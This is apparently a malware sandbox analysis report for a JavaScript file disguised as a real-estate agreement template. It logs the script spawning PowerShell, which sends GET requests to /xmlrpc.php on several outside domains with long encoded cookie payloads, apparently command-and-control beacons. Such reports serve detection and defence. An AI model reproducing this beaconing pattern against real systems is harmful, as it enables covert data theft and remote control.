                                      Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g+sY1qlsVaFrs8IDI2axK4daJHy8TNkUx5yke8udy6InO3aaDF8cOvhEyUm02G4ZiAdW9oAi+gVB48hmb6VzOydy8z+4ZOBJzlk4GQGDLHnOc/2vYNknLSrRQUeeXnZoScGEbvaVXgW3Knygnxb5YdhsB3sNNqtwdOkFMIHsFzBuWROMFqJvCiaQrQe3hg3WQ0td9eCKBkBntVCP6xH9v8EsTmR+JajdgMI62PNJYT [TRUNCATED]
                                      Host: naturalanimals.net
                                      Connection: Close
2024-05-06 16:41:19 UTC | 381 | IN | HTTP/1.1 405 Method Not Allowed
                                      Server: nginx
                                      Date: Mon, 06 May 2024 16:41:19 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/8.0.30
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Allow: POST
                                      Set-Cookie: PHPSESSID=2opl9jclbrpt353fmi9b8sot5n; path=/
2024-05-06 16:41:19 UTC | 53 | IN | Data Raw: 32 61 0d 0a 58 4d 4c 2d 52 50 43 20 73 65 72 76 65 72 20 61 63 63 65 70 74 73 20 50 4f 53 54 20 72 65 71 75 65 73 74 73 20 6f 6e 6c 79 2e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 2aXML-RPC server accepts POST requests only.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49709 | 78.46.3.78 | 443 | 6768 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-06 16:41:40 UTC | 2082 | OUT | GET /xmlrpc.php HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Cookie: 1C5A6FBD41=[REMOVED]; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W7CMAz8leUH9g8MdRrSGBOF8Vy1brFIYmOnhUr5+LnNpjzkIt+d77Jh9tg2CSm+SxPggzRl11K8FqCtIK9AVO1KfaCYXddoYXbeF2b3CNnBkz0JSHY9xdTJVGa7zkN2XpvFYg+BZH7ZUmABVVzs9nRW2pryQnJb5Ie+xxa2Fu12ouNoFKYHiF7B++yOMKAmmQ2NMWGAN6FVVkMj7XXDnJ2CTGZhC+tBwj9BsSTS0EiybgBxeSy5lIm [TRUNCATED]
                                      Host: weissenbach-pr.de
                                      Connection: Close
2024-05-06 16:41:41 UTC | 482 | IN | HTTP/1.1 405 Method Not Allowed
                                      Date: Mon, 06 May 2024 16:41:41 GMT
                                      Server: Apache
                                      X-Powered-By: PHP/8.0.30
                                      Allow: POST
                                      Set-Cookie: _icl_current_language=de; expires=Tue, 07-May-2024 16:41:41 GMT; Max-Age=86400; path=/
                                      Set-Cookie: _icl_current_language=de; expires=Tue, 07-May-2024 16:41:41 GMT; Max-Age=86400; path=/
                                      Upgrade: h2
                                      Connection: Upgrade, close
                                      Vary: User-Agent
                                      Cache-Control: s-maxage=10
                                      Transfer-Encoding: chunked
                                      Content-Type: text/plain;charset=utf-8
2024-05-06 16:41:41 UTC | 53 | IN | Data Raw: 32 61 0d 0a 58 4d 4c 2d 52 50 43 20 73 65 72 76 65 72 20 61 63 63 65 70 74 73 20 50 4f 53 54 20 72 65 71 75 65 73 74 73 20 6f 6e 6c 79 2e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 2aXML-RPC server accepts POST requests only.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49710 | 195.28.10.122 | 443 | 3952 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-06 16:41:41 UTC | 2076 | OUT | GET /xmlrpc.php HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Cookie: 1C5A6FBD41=[REMOVED]; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W7CMAz8leUH9g8MdRrSGBOF8Vy1brFIYmOnhUr5+LnNpjzkIt+d77Jh9tg2CSm+SxPggzRl11K8FqCtIK9AVO1KfaCYXddoYXbeF2b3CNnBkz0JSHY9xdTJVGa7zkN2XpvFYg+BZH7ZUmABVVzs9nRW2pryQnJb5Ie+xxa2Fu12ouNoFKYHiF7B++yOMKAmmQ2NMWGAN6FVVkMj7XXDnJ2CTGZhC+tBwj9BsSTS0EiybgBxeSy5lIm [TRUNCATED]
                                      Host: memar98.com
                                      Connection: Close
2024-05-06 16:41:42 UTC | 186 | IN | HTTP/1.1 403 Forbidden
                                      Server: nginx
                                      Date: Mon, 06 May 2024 16:41:41 GMT
                                      Content-Type: text/html; charset=iso-8859-1
                                      Content-Length: 199
                                      Connection: close
                                      Vary: Accept-Encoding
2024-05-06 16:41:42 UTC | 199 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49712 | 153.127.91.146 | 443 | 6768 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-06 16:42:03 UTC | 2079 | OUT | GET /xmlrpc.php HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Cookie: 1C5A6FBD41=[REMOVED]; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g9dxbRKY51KO55RMNRqErt2oEXKxy+QTX7wSb673GXH7NB2ESm8S+fhgzQmYylcC1AryBsQ1bzi4Ckk03damL1zhdk/fDLwZEcCksxAIfYyl9uhd5CM0261qMGTLC978iygiqtdTRelfVa2JLdVfhwGtLDP0W5nOk2ZwvQA0Ss4l8wJRtQoS0ZTiOjhTWiTNdCJve6Yk1GQOVvkB5tR/D9BsSRSv0ZRJnI6Z0rsJNY [TRUNCATED]
                                      Host: tennoji-law-uranai.com
                                      Connection: Close
2024-05-06 16:42:04 UTC | 374 | IN | HTTP/1.1 405 Method Not Allowed
                                      Server: nginx
                                      Date: Mon, 06 May 2024 16:42:04 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 42
                                      Connection: close
                                      Set-Cookie: PHPSESSID=29lrn63q00o1k4qm11qad10nl6; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      Pragma: no-cache
                                      Allow: POST
2024-05-06 16:42:04 UTC | 42 | IN | Data Raw: 58 4d 4c 2d 52 50 43 20 73 65 72 76 65 72 20 61 63 63 65 70 74 73 20 50 4f 53 54 20 72 65 71 75 65 73 74 73 20 6f 6e 6c 79 2e
                                      Data Ascii: XML-RPC server accepts POST requests only.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49711 | 153.127.91.146 | 443 | 3952 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-06 16:42:03 UTC | 2079 | OUT | GET /xmlrpc.php HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Cookie: 1C5A6FBD41=[REMOVED]; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g9dxbRKY51KO55RMNRqErt2oEXKxy+QTX7wSb673GXH7NB2ESm8S+fhgzQmYylcC1AryBsQ1bzi4Ckk03damL1zhdk/fDLwZEcCksxAIfYyl9uhd5CM0261qMGTLC978iygiqtdTRelfVa2JLdVfhwGtLDP0W5nOk2ZwvQA0Ss4l8wJRtQoS0ZTiOjhTWiTNdCJve6Yk1GQOVvkB5tR/D9BsSRSv0ZRJnI6Z0rsJNY [TRUNCATED]
                                      Host: tennoji-law-uranai.com
                                      Connection: Close
2024-05-06 16:42:04 UTC | 374 | IN | HTTP/1.1 405 Method Not Allowed
                                      Server: nginx
                                      Date: Mon, 06 May 2024 16:42:04 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 42
                                      Connection: close
                                      Set-Cookie: PHPSESSID=aamhmofo78d8otgv956pljdj71; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      Pragma: no-cache
                                      Allow: POST
2024-05-06 16:42:04 UTC | 42 | IN | Data Raw: 58 4d 4c 2d 52 50 43 20 73 65 72 76 65 72 20 61 63 63 65 70 74 73 20 50 4f 53 54 20 72 65 71 75 65 73 74 73 20 6f 6e 6c 79 2e
                                      Data Ascii: XML-RPC server accepts POST requests only.


                                      Target ID:5
                                      Start time:18:37:53
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\real estate co ownership agreement template 43632.js"
                                      Imagebase:0x7ff7c7e50000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:17
                                      Start time:19:50:30
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wscript.EXE DEVELO~1.JS
                                      Imagebase:0x7ff7c7e50000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:19
                                      Start time:19:50:49
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\cscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
                                      Imagebase:0x7ff72bed0000
                                      File size:161'280 bytes
                                      MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:20
                                      Start time:19:50:49
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:21
                                      Start time:19:50:56
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wscript.EXE DEVELO~1.JS
                                      Imagebase:0x7ff7c7e50000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:22
                                      Start time:19:51:07
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:23
                                      Start time:19:51:16
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\cscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
                                      Imagebase:0x7ff72bed0000
                                      File size:161'280 bytes
                                      MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:24
                                      Start time:19:51:16
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:25
                                      Start time:19:51:33
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      No disassembly